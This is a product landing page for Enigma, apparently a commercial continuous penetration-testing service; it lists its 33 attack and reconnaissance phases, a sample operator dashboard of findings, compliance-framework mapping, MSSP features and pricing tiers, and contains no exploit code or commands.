Continuous validation · Verifiable Wave 122 · v5.1

Continuous validation, live.

Enigma runs 33 phases of autonomous reconnaissance, attack-surface mapping, and exploit synthesis against your own assets — 24/7. No queue. No checklist. Real exploits, with proof.

Start a scan → View the engine →
33
Phases
117K LOC
Go pipeline
8+
AI providers
<5% FP
Cross-validated
Platform / 02

What Enigma does.

Three jobs, run continuously against your perimeter and your authenticated surface. Every finding ships with a working PoC and a control mapping.

01

Find what manual pentests miss.

An annual pentest captures one week of your perimeter, once a year. Enigma re-tests every 24 hours, on every deploy, against every new subdomain that surfaced overnight. Coverage is continuous, not a calendar event.

02

Prove every finding.

AutoSolver V2 chains recon, payload synthesis, and replay until an exploit lands. Each finding ships with a curl-replayable request, a byte-level response diff, and a screen recording where a browser was involved. No drive-by CVEs. No theoretical maybes.

03

Map to controls automatically.

PCI DSS 4.0, SOC 2 Type II, OWASP Top 10, NIST 800-53 Rev 5, and DORA mappings happen at write-time. Open the finding, see the failed controls. Open the framework, see the failing findings. Bidirectional, always.

Mission control / 05

The operator console.

Calm, fast, dense — built for the SOC, not the marketer. Keyboard-first. Sub-second scan-state refresh. Every row is a link to a replayable exploit.

https://enigma.sc/admin — Operations command
Mission control

Operations command

All systems nominal
Active scans
12
▲ +3 today
Total findings
247
▲ +18 today
Critical issues
4
▼ −2 today
Compliance score
87%
▲ +2% this week
Active scans Live · auto-refresh 10s
Target Phase Started Progress Status
api.acme.com 14 / 33 · WAF bypass 2h ago
● Running
app.beta.io 33 / 33 · Complete 5h ago
Validated
vpn.gamma.net 22 / 33 · PoC generation 1h ago
● Running
edge-gw.eu-west-2 queued
Queued
internal.dashboards 33 / 33 · Complete 8h ago
Validated
Recent findings Last 6h
Critical
Blind SQL injection in /v2/users authenticated endpoint
api.acme.com/v2/users · F-9821
12 min ago
High
JWT public-key-as-HMAC signer accepts attacker-issued tokens
auth.acme.com · F-9820
38 min ago
High
Race condition on coupon redeem (HTTP/2 single-packet)
app.beta.io/checkout · F-9819
1h ago
Medium
Pug template injection on profile bio render
app.beta.io/u/:id · F-9818
2h ago
Low
EXIF GPS coordinates leak from uploaded avatars
cdn.acme.com/avatars · F-9817
3h ago
Compliance posture Continuous mapping
PCI DSS 4.0
92%
395 / 428 controls
OWASP Top 10
88%
237 / 270 checks
SOC 2 Type II
95%
61 / 64 controls
NIST 800-53
81%
793 / 980 controls
Enigma · Operations command Live walk-through 1280 × 720
Pipeline / 06

33 phases. Continuous.

The pipeline is a directed graph. Phases run in parallel where the dependencies allow, gated by tier and scope. The brain takes over from phase 30 onward.

Phase / 00
OSINT credential intel
Phase / 01
Subdomain enumeration
Phase / 02
DNS + HTTP probe
Phase / 03
Port scan
Phase / 04
URL discovery
Phase / 05
JS secrets
Phase / 06
Parameter discovery
Phase / 07
Nuclei vuln scan
Phase / 08
Subdomain takeover
Phase / 09
SQLi detection
Phase / 10
XSS detection
Phase / 11
SSRF + redirect + LFI
Phase / 12
CORS testing
Phase / 13
Directory bruteforce
Phase / 14
Screenshots
Phase / 15
Origin IP discovery
Phase / 16
WAF detection & bypass
Phase / 17
Advanced SQLi
Phase / 18
bbot deep recon
Phase / 19
XXE injection
Phase / 20
NoSQL injection
Phase / 21
HTTP smuggling
Phase / 22
JWT attacks
Phase / 23
GraphQL exploitation
Phase / 24
CRLF / cache / proto
Phase / 25
Exposed paths
Phase / 26
Race condition
Phase / 27
Security headers & Log4Shell
Phase / 28
ZAP active scan
Phase / 29
PoC verification
Phase / 30
AI Red Team
Phase / 31
AI auth-surface attacks
Phase / 32
Juice Shop solver
Phase / 33
Juice Shop browser solver
AI Red Team · phase 30 AI auth-surface attacks · phase 31 AI-piloted CTF solver · phase 32
Coverage / 07

Tests that matter, mapped to controls.

Six frameworks, mapped at write-time. The same finding row drives the framework score, the executive summary, and the Jira ticket. One source of truth.

PCI DSS 4.0
92%
Continuous · 428 controls
OWASP Top 10
100%
Auto-mapped · 270 checks
SOC 2 Type II
95%
Gap analysis · 64 controls
NIST 800-53 r5
81%
Continuous · 980 controls
DORA
87%
EU financial · 5 pillars
ISO 27001
90%
Annex A · 93 controls
Wave 122 / 08

Twelve newest capabilities.

Shipped in the latest cut. Covered out of the box against H1 2026 CVE classes — pug template injection, JWT confusion, HTTP/2 race lanes, DOM-XSS, Web3, EXIF and stego payloads.

01Pug template injection escalator
02JWT public-key-as-HMAC signer
03Race-condition runner (HTTP/2 single-packet)
04Headless browser solver (DOM-XSS, WS, Web3)
05Socket.IO v4 client
06EXIF GPS reverse-geocode
07LSB steganography decoder
08SHA-1 truncation coupon forger
09Authenticated session capture / replay
10Multi-tenant client switcher
11SARIF / CycloneDX export
12MITRE ATT&CK Navigator JSON layer
MSSP / 09

Built for the MSSP.

One Enigma, many tenants. Per-customer scoping, per-customer reports, per-customer brand. The provider sees everything; the customer sees their surface only.

01

Per-tenant scoping

RBAC + scope filter at every phase boundary. Out-of-scope assets are dropped before the recon stage even sees them.

02

White-label PDF reports

Per-tenant logo, palette, and intro letter. The PDF, the SARIF, the CycloneDX, and the customer portal all rebrand together.

03

Customer self-serve portal

Customers see their findings, their replays, their compliance posture. Read-only by default; comment, accept-risk, and reopen are role-gated.

04

SAML / OIDC + SCIM

Federated identity for the operator side, SCIM for user provisioning. Audit trail is signed and worm-stored per tenant.

Proof / 10

Numbers that hold up.

33
Phases
1000+
Test patterns
93/111
Juice Shop benchmark
<8min
Typical scan wall-time

Numbers from the Wave 122 build on the canonical OWASP Juice Shop benchmark. Real targets vary — production scans average 16 minutes wall time, dominated by phase 9 timing oracle and phase 17 advanced SQLi.

Pricing / 11

Three tiers. Hard limits.

Limits below are the actual values from the licensing engine. No asterisks. No "contact us for pricing on the homepage but the docs say otherwise" games.

Tier / 01
Community
Free — for the tinkerers and the curious.
  • 1 target
  • 3 scans per day
  • 16 phases (recon + core injection)
  • Basic AI triage
  • Free OSINT providers only
  • JSON + HTML reports
  • 1 user
Start free →
Tier / 02 · Most teams
Pro
For one security team running continuous validation.
  • 25 targets
  • Unlimited scans
  • All 33 phases — including the AI brain
  • All OSINT providers
  • HTML, PDF, JSON, SARIF reports
  • OWASP + PCI compliance mapping
  • API access · scheduling · unlimited users
Talk to engineering
Tier / 03
Enterprise
For MSSPs and regulated multi-tenant deployments.
  • Unlimited targets
  • Unlimited scans
  • All 33 phases
  • Bundled OSINT (no third-party keys)
  • HTML, PDF, JSON, SARIF, Caido, white-label
  • OWASP + PCI + SOC 2 + ISO 27001 + DORA
  • Multi-tenant · SAML / OIDC · SCIM
Talk to engineering
Ready / 12

Ready to validate?

Sign in with an existing operator account, or talk to the engineers who shipped the brain.

Sign in → Talk to engineering